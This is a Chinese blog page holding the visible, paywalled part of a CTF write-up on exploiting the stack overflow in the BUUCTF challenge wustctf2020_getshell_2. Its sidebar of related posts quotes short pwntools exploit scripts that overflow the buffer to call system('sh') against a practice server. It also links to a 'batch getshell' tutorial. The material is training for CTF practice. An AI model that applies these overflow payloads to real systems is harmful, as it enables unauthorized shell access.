buuctf wustctf2020_getshell_2 ret2shellcode

最新推荐文章于 2024-02-07 03:42:45 发布
最新推荐文章于 2024-02-07 03:42:45 发布
阅读量616 收藏
点赞数 1
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441024/article/details/110442952
版权

BUUCTF wustctf2020_getshell_2 ret2shellcode

在这里插入图片描述
check一下,32位的程序且没有开任何保护
在这里插入图片描述
用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节
在这里插入图片描述
这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置

$ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshell_2'  --string "sh"

0x08048670 : sh

找到"sh"所在的地址为0x08048670

最低0.47元/天 解锁文章
三哥sange
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[buuctf]wustctf2020_getshell_2
逆向萌新的博客
07-03 289
[buuctf]wustctf2020_getshell_2
BUUCTF pwn——wustctf2020_getshell_2
CNS-Enterprise BCC-1701-J
05-23 104
BUUCTF 做题练习
[BUUCTF-pwn]——wustctf2020_getshell_2
Y_peak的博客
03-19 394
[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1154
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
buuctf ciscn_2019_n_5 (ret2shellcode
carol2358的博客
04-21 1002
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
DAC.zip_DAC_HAL_LIB_STM32L452RET6
09-24
在STM32L452RET6中,它具有2个独立的12位DAC通道,可用于驱动模拟输出,如音频、传感器校准或电源控制。 **STM32L452RET6的DAC特性:** 1. **双通道支持**:MCU包含两个独立的DAC通道,DAC1和DAC2。 2. **触发源**...
I2C.zip_HAL_LIB_i2c_联合开发
09-14
在本文中,我们将深入探讨如何在基于STM32L452RET6微控制器的项目中使用I2C(Inter-Integrated Circuit)通信协议,并结合HAL库进行联合开发。I2C是一种流行的串行通信协议,它允许微控制器与各种外围设备如传感器、...
pwn07.ret2syscall例题
11-11
ret2syscall例题
RETAS_HD_PRO.zip
06-29
图像: BMP, CELD, DGAD, LIF, PICT (*4), PNG, SGI, SKF, SOFTIMAGE, SVD (*1), TARGA, TIFF (*2) 音频: AIFF (*3/*4), WAV (*3/*4) 输出: CELD RETAS是来自日本的二维无纸动画软件,共分为四个模块,TraceMan扫描...
ret2dl_resolve解析1
08-08
在深入探讨`ret2dl_resolve解析1`这个主题之前,我们先来理解一些基础的ELF(Executable and Linking Format)文件格式和动态链接的概念。ELF是Unix系统及其变种,如Linux,广泛使用的可执行文件、共享库和核心转储...
批量getshell教程+工具
07-28
批量getshell教程+工具
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
最新发布
qq_66013948的博客
02-07 489
Linux下查找文件(find、grep命令)_linux查找文件-CSDN博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字,最后通过上一条语句进行查找,当然,如果猜不到,那么还是只有挨个找了。
wustctf2020_getshell_2
m0_73756460的博客
01-14 116
buuctf刷题 wustctf2020_getshell_2(writeup)
pwn刷题num35----ret2shellcode
tbsqigongzi的博客
04-29 297
BUUCTF-PWN-ciscn_2019_n_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 未开启NX保护-----堆栈可执行,可注入shellcode 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,先是让我们输入一个name,之后让我们输入一些信息,什么也看不出来 ida一下 注意两个函数 read(0, name, 0x64uLL);
ret2shellcode
qq_45691294的博客
12-18 4609
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例题 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
[BUUCTF]PWN——wustctf2020_getshell
BangSen1的博客
03-30 267
wustctf2020_getshell 例行检查 ,开启NX保护,32位, 运行一下,打印出一个图形。 用IDA打开。看到了关键函数。 shelladdr=0x804851B 查看主函数,buf的长度为0x18,读取的长度为0x20,可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',28128) shelladdr=0x804851B payload='a'*(0x18+4)+p32(shelladdr) r.sendline(payl
WUST-CTF2020-WP
夏日 の blog
03-29 5290
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
webshell初探,buu20
m0_48127441的博客
03-09 184
场景: buu 刷到20题, 使用了ret2lib拿到了flag 但是网上的解法都是写webshell,那就写一个试试水 总所周知:地址随机化,或者说模块的重定位 这里说的模块 包括dll,so,sys,可执行文件等 只要这个文件中有重定位表,即可进行地址随机化,同时意味着如果没有基址,就无法调用的正确的函数,直接crash 让我们再来看看call jmp,取全局变量等操作 要么是使用了相对偏移,要么使用了绝对地址 相对偏移在 任何情况下,针对自身模块的操作总是正确的 //不扩...
err_misc_register: err_gpio_direction: gpio_free(gpio_led2); err_get_gpio2: gpio_free(gpio_led1); err_get_gpio1: return ret;每一句代码意思
06-07
err_get_gpio2: ``` 发生gpio_request函数获取GPIO资源gpio_led2失败的错误,执行以下代码。 ```c gpio_free(gpio_led1); ``` 释放之前申请的GPIO资源gpio_led1。 ```c err_get_gpio1: ``` 发生gpio_request函数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值